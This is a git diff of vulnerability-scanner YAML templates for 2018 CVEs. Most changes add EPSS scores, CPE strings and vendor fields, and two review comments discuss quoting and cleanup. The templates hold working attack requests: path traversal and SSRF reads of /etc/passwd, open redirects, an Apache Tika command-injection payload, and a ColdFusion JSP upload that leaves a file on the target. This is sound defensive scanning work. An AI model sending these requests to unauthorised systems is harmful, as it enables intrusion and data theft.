diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index 3f4bf07cb4..b843f7ef82 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -15,9 +15,13 @@ info: cvss-score: 5.4 cve-id: CVE-2018-12095 cwe-id: CWE-79 - tags: cve,cve2018,xss,edb + epss-score: 0.00407 + cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oecms_project + product: oecms + tags: cve,cve2018,xss,edb http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 1ead21f04f..1b513a24fa 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -13,9 +13,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-12296 cwe-id: CWE-732 - tags: cve,cve2018,seagate,nasos,disclosure,unauth + epss-score: 0.01284 + cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: seagate + product: nas_os + tags: cve,cve2018,seagate,nasos,disclosure,unauth http: - raw: @@ -34,7 +38,7 @@ http: extractors: - type: regex - part: body group: 1 regex: - '"version": "([0-9.]+)"' + part: body diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index cf425691b2..124fa33703 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -13,13 +13,16 @@ info: cvss-score: 6.1 cve-id: CVE-2018-12300 cwe-id: CWE-601 - tags: cve,cve2018,redirect,seagate,nasos + epss-score: 0.00118 + cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: seagate + product: nas_os + tags: cve,cve2018,redirect,seagate,nasos http: - method: GET - path: - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#' 
diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index 8fc912dc37..a9ea137c63 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -9,18 +9,20 @@ info: - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 - https://www.phpmyadmin.net/security/PMASA-2018-4/ - https://www.exploit-db.com/exploits/44928/ - - http://web.archive.org/web/20210124181726/https://www.securityfocus.com/bid/104532/ - https://nvd.nist.gov/vuln/detail/CVE-2018-12613 + - https://security.gentoo.org/glsa/201904-16 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2018-12613 cwe-id: CWE-287 + epss-score: 0.97501 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* - epss-score: 0.97516 - tags: vulhub,edb,cve,cve2018,phpmyadmin,lfi metadata: max-request: 1 + vendor: phpmyadmin + product: phpmyadmin + tags: vulhub,edb,cve,cve2018,phpmyadmin,lfi http: - method: GET @@ -29,11 +31,10 @@ http: matchers-condition: and matchers: - - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 23e85b7035..5515f21043 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml 
@@ -10,33 +10,39 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-12634 - https://www.seebug.org/vuldb/ssvid-97353 - https://www.exploit-db.com/exploits/45384/ + - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-12634 cwe-id: CWE-200 + epss-score: 0.96198 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* - epss-score: 0.96925 - tags: cve,cve2018,scada,circontrol,circarlife,logs,edb metadata: max-request: 1 + vendor: circontrol + product: circarlife_scada + tags: cve,cve2018,scada,circontrol,circarlife,logs,edb http: - method: GET path: - "{{BaseURL}}/html/log" + matchers-condition: and matchers: - type: word part: header words: - "CirCarLife Scada" + - type: word words: - "user.debug" - "user.info" - "EVSE" condition: and + - type: status status: - 200 diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 9c48d3e539..1cfa7afed7 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -16,9 +16,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-12675 cwe-id: CWE-601 + epss-score: 0.00118 + cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: max-request: 1 verified: true + vendor: sv3c + product: h.264_poe_ip_camera_firmware tags: cve,cve2018,redirect,sv3c,camera,iot http: diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index 44cae814ed..9618696e9a 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml 
@@ -8,29 +8,34 @@ info: reference: - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - https://pivotal.io/security/cve-2018-1271 - - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699 - https://access.redhat.com/errata/RHSA-2018:1320 - https://nvd.nist.gov/vuln/detail/CVE-2018-1271 + - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.9 cve-id: CVE-2018-1271 cwe-id: CWE-22 - epss-score: 0.01676 - tags: cve,cve2018,spring,lfi,traversal + epss-score: 0.00986 + cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: vmware + product: spring_framework + tags: cve,cve2018,spring,lfi,traversal http: - method: GET path: - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + matchers-condition: and matchers: - type: word words: - 'for 16-bit app support' + - type: status status: - 200 diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index 138e3dbd91..3080065af2 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml 
@@ -15,13 +15,18 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-1273 - https://pivotal.io/security/cve-2018-1273 - http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E + - https://www.oracle.com/security-alerts/cpujul2022.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-1273 - cwe-id: CWE-20 + cwe-id: CWE-20,CWE-94 + epss-score: 0.97498 + cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: pivotal_software + product: spring_data_commons tags: cve,cve2018,vmware,rce,spring,kev http: @@ -38,11 +43,10 @@ http: command: - "cat /etc/passwd" - "type C:\\/Windows\\/win.ini" - matchers: - type: regex part: body regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" - condition: or \ No newline at end of file + condition: or diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index 392ee807ae..5060ae2c55 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -14,10 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-12998 cwe-id: CWE-79 - epss-score: 0.97193 - tags: cve,cve2018,zoho,xss,manageengine,packetstorm + epss-score: 0.97111 + cpe: cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zohocorp + product: firewall_analyzer + tags: cve,cve2018,zoho,xss,manageengine,packetstorm http: - method: GET @@ -26,17 +29,16 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "" - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index 7d036679aa..3dfaa27691 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml 
@@ -9,42 +9,47 @@ info: - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ - https://www.exploit-db.com/exploits/47208 - https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E - - http://web.archive.org/web/20210516175956/https://www.securityfocus.com/bid/104001 - https://nvd.nist.gov/vuln/detail/CVE-2018-1335 + - http://packetstormsecurity.com/files/153864/Apache-Tika-1.17-Header-Command-Injection.html remediation: Upgrade to Tika 1.18. classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-1335 - tags: edb,cve,cve2018,apache,tika,rce + epss-score: 0.97341 + cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: tika + tags: packetstorm,edb,cve,cve2018,apache,tika,rce,intrusive http: - method: PUT path: - "{{BaseURL}}/meta" + + body: var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec("cmd /c whoami"); + headers: X-Tika-OCRTesseractPath: cscript X-Tika-OCRLanguage: //E:Jscript Expect: 100-continue Content-type: image/jp2 Connection: close - body: "var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");" matchers-condition: and matchers: - - type: word + part: header words: - "Content-Type: text/csv" - part: header - type: word - words: - - "org.apache.tika.parser.DefaultParser" - - "org.apache.tika.parser.gdal.GDALParse" part: body + words: + - org.apache.tika.parser.DefaultParser + - org.apache.tika.parser.gdal.GDALParse condition: and - type: status diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 2cbc98f0bc..2c04a2b4a0 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml 
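Review bot: The CVE-2018-1335 hunk rewrites `body:` as an unquoted plain scalar, `body: var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec("cmd /c whoami");`, which parses today only because the JScript payload happens to contain no `: ` or ` #` sequence; a later edit that introduces either (an object literal, a space after a colon, a `#`) would make the template fail to load or silently truncate the payload at the comment. Keep it quoted, e.g. `body: 'var oShell = WScript.CreateObject(''WScript.Shell'');var oExec = oShell.Exec("cmd /c whoami");'`, which is the safe form for a string carrying both quote styles and punctuation. The unquoted word matchers such as `- org.apache.tika.parser.DefaultParser` are harmless plain scalars. The trailing `- type: status` matcher continues outside the hunk.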
@@ -14,12 +14,14 @@ info: cvss-score: 9.8 cve-id: CVE-2018-13379 cwe-id: CWE-22 + epss-score: 0.97492 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* - epss-score: 0.975 metadata: max-request: 1 verified: true shodan-query: http.html:"/remote/login" "xxxxxxxx" + vendor: fortinet + product: fortios tags: cve,cve2018,fortios,lfi,kev http: diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index edf167228a..b794df3558 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -16,9 +16,12 @@ info: cve-id: CVE-2018-13380 cwe-id: CWE-79 epss-score: 0.00122 - tags: cve,cve2018,fortios,xss,fortinet + cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: fortinet + product: fortios + tags: cve,cve2018,fortios,xss,fortinet http: - method: GET @@ -37,9 +40,9 @@ http: - type: word part: header + negative: true words: - "application/json" - negative: true - type: status status: diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index 4c272ccdcc..387d6a8bf6 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -15,11 +15,13 @@ info: cvss-score: 5.5 cve-id: CVE-2018-13980 cwe-id: CWE-22 + epss-score: 0.0018 cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:* - epss-score: 0.00089 - tags: cve,cve2018,lfi,edb,packetstorm metadata: max-request: 1 + vendor: zeta-producer + product: zeta_producer + tags: cve,cve2018,lfi,edb,packetstorm http: - method: GET @@ -28,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 208e93a322..763aef53de 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml 
@@ -15,9 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14013 cwe-id: CWE-79 - tags: cve,cve2018,xss,zimbra + epss-score: 0.00533 + cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: synacor + product: zimbra_collaboration_suite + tags: cve,cve2018,xss,zimbra http: - method: GET @@ -27,15 +31,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index e1c92c1376..79f4242e5c 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -14,9 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2018-14064 cwe-id: CWE-22 - tags: edb,cve,cve2018,lfi,camera,iot + epss-score: 0.28372 + cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: velotismart_project + product: velotismart_wifi_firmware + tags: edb,cve,cve2018,lfi,camera,iot http: - method: GET @@ -25,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 7fc197fb5e..9c971abb46 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -16,9 +16,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14474 cwe-id: CWE-601 - tags: cve2018,redirect,orangeforum,oss,seclists,cve + epss-score: 0.00068 + cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: goodoldweb + product: orange_forum + tags: cve2018,redirect,orangeforum,oss,seclists,cve http: - method: GET diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 4dfe408834..929c5828ad 100644 --- a/http/cves/2018/CVE-2018-14574.yaml 
+++ b/http/cves/2018/CVE-2018-14574.yaml @@ -10,7 +10,6 @@ info: - https://usn.ubuntu.com/3726-1/ - http://web.archive.org/web/20211206044224/https://securitytracker.com/id/1041403 - https://www.debian.org/security/2018/dsa-4264 - - http://web.archive.org/web/20210124194607/https://www.securityfocus.com/bid/104970/ - https://access.redhat.com/errata/RHSA-2019:0265 - https://nvd.nist.gov/vuln/detail/CVE-2018-14574 classification: @@ -18,9 +17,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14574 cwe-id: CWE-601 - tags: cve,cve2018,django,redirect + epss-score: 0.00962 + cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: djangoproject + product: django + tags: cve,cve2018,django,redirect http: - method: GET @@ -29,11 +32,12 @@ http: matchers-condition: and matchers: - - type: status - status: - - 301 - type: word + part: header words: - "Location: https://www.interact.sh" - "Location: http://www.interact.sh" - part: header + + - type: status + status: + - 301 diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index 40d69109b0..0345e2dd59 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -14,19 +14,22 @@ info: cvss-score: 9.8 cve-id: CVE-2018-14728 cwe-id: CWE-918 - tags: cve,cve2018,ssrf,lfi,packetstorm,edb + epss-score: 0.96872 + cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tecrail + product: responsive_filemanager + tags: cve,cve2018,ssrf,lfi,packetstorm,edb,intrusive http: - method: POST path: - "{{BaseURL}}/filemanager/upload.php" - body: "fldr=&url=file:///etc/passwd" - + body: fldr=&url=file:///etc/passwd matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index dfc1d0de73..b953b2716f 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml 
@@ -10,14 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-14912 - https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html - https://bugs.chromium.org/p/project-zero/issues/detail?id=1627 + - https://lists.debian.org/debian-lts-announce/2018/08/msg00005.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-14912 cwe-id: CWE-22 - tags: cve,cve2018,cgit,lfi + epss-score: 0.97328 + cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cgit_project + product: cgit + tags: cve,cve2018,cgit,lfi http: - method: GET diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index 1255073c74..ec3e53d1fb 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -15,9 +15,13 @@ info: cvss-score: 9.1 cve-id: CVE-2018-14916 cwe-id: CWE-732 - tags: cve2018,loytec,lfi,packetstorm,seclists,cve + epss-score: 0.00483 + cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: loytec + product: lgate-902_firmware + tags: cve2018,loytec,lfi,packetstorm,seclists,cve http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index 786baa0e19..421ee00d8f 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -15,10 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2018-14918 cwe-id: CWE-22 + epss-score: 0.4378 + cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"LGATE-902" verified: true + vendor: loytec + product: lgate-902_firmware tags: loytec,lfi,seclists,packetstorm,cve,cve2018,lgate http: diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 3a71012a18..d9cf3f4c5a 100644 --- a/http/cves/2018/CVE-2018-14931.yaml 
+++ b/http/cves/2018/CVE-2018-14931.yaml @@ -13,13 +13,16 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14931 cwe-id: CWE-601 - tags: cve,cve2018,redirect,polarisft,intellect + epss-score: 0.00118 + cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: polarisft + product: intellect_core_banking + tags: cve,cve2018,redirect,polarisft,intellect http: - method: GET - path: - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh' diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index 00e9db5066..b4aa70e2de 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -14,9 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15138 cwe-id: CWE-22 - tags: cve,cve2018,ericsson,lfi,traversal,edb + epss-score: 0.31973 + cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: ericssonlg + product: ipecs_nms + tags: cve,cve2018,ericsson,lfi,traversal,edb http: - method: GET @@ -25,6 +29,7 @@ http: - "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg" stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index c4b8e8b59c..ddda32c21c 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -15,9 +15,13 @@ info: cvss-score: 8.6 cve-id: CVE-2018-15517 cwe-id: CWE-918 - tags: seclists,packetstorm,cve,cve2018,dlink,ssrf,oast + epss-score: 0.01414 + cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* metadata: max-request: 1 + vendor: dlink + product: central_wifimanager + tags: seclists,packetstorm,cve,cve2018,dlink,ssrf,oast http: - method: GET diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 54bb89a0ef..ec4c24bbfd 100644 
--- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -15,9 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15535 cwe-id: CWE-22 - tags: cve,cve2018,lfi,edb,seclists + epss-score: 0.9713 + cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tecrail + product: responsive_filemanager + tags: cve,cve2018,lfi,edb,seclists http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index 108f8706a2..06225dbd1d 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -16,9 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15745 cwe-id: CWE-22 - tags: packetstorm,edb,cve,cve2018,argussurveillance,lfi,dvr + epss-score: 0.96738 + cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: argussurveillance + product: dvr + tags: packetstorm,edb,cve,cve2018,argussurveillance,lfi,dvr http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index 8847ddaf86..dd68e261cf 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml 
@@ -10,14 +10,19 @@ info: - https://github.com/xbufu/CVE-2018-15961 - https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html - http://web.archive.org/web/20220309060906/http://www.securitytracker.com/id/1041621 + - http://www.securitytracker.com/id/1041621 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-15961 cwe-id: CWE-434 + epss-score: 0.97474 + cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.component:"Adobe ColdFusion" + vendor: adobe + product: coldfusion tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive http: @@ -53,17 +58,15 @@ http: {{randstr}}.jsp -----------------------------24464570528145-- - - | GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - - type: word words: - - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 + - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 - type: status status: diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index f868909086..3bdf2ccf68 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml 
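Review bot: The uploaded `{{randstr}}.jsp` under `/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/` is fetched by the second request but never removed, so every successful run leaves a server-side JSP on the target; the raw request list starts before this hunk, but the template should either add a cleanup request where the product allows it or state in its description that an artifact is left behind and must be removed manually. The newly added plain `http://www.securitytracker.com/id/1041621` reference duplicates the archived link immediately above it and securitytracker is no longer online, so keeping only the web.archive.org entry avoids a dead link.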
@@ -10,27 +10,33 @@ info: - https://ics-cert.us-cert.gov/advisories/ICSA-19-073-03 - https://nvd.nist.gov/vuln/detail/CVE-2018-16059 - https://www.exploit-db.com/exploits/45342/ + - https://cert.vde.com/en-us/advisories/vde-2019-002 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2018-16059 cwe-id: CWE-22 - tags: cve,cve2018,iot,lfi,edb + epss-score: 0.64355 + cpe: cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: endress + product: wirelesshart_fieldgate_swg70_firmware + tags: cve,cve2018,iot,lfi,edb http: - method: POST path: - "{{BaseURL}}/fcgi-bin/wgsetcgi" + body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand' matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index 6723a086ac..4e63f521f2 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -15,9 +15,13 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16133 cwe-id: CWE-22 - tags: lfi,packetstorm,cve,cve2018,cybrotech + epss-score: 0.07059 + cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cybrotech + product: cybrohttpserver + tags: lfi,packetstorm,cve,cve2018,cybrotech http: - raw: diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index d2b8af37c2..e21bbe5fb1 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml 
@@ -14,10 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-16139 cwe-id: CWE-79 + epss-score: 0.00135 + cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Bibliopac" verified: true + vendor: bibliosoft + product: bibliopac tags: cve,cve2018,xss,bibliopac,bibliosoft http: diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 8beb4420f9..f94ff71fc5 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -11,15 +11,21 @@ info: - https://wordpress.org/plugins/gift-voucher/ - https://www.exploit-db.com/exploits/45255/ - https://nvd.nist.gov/vuln/detail/CVE-2018-16159 + - https://wpvulndb.com/vulnerabilities/9117 remediation: Fixed in version 4.1.8. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-16159 cwe-id: CWE-89 + epss-score: 0.01316 + cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 verified: true + framework: wordpress + vendor: codemenschen + product: gift_vouchers tags: sqli,wordpress,unauth,wp,gift-voucher,cve2018,edb,wpscan,cve,wp-plugin http: diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 9bf4abb64c..7e81b077af 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -15,9 +15,13 @@ info: cvss-score: 9.8 cve-id: 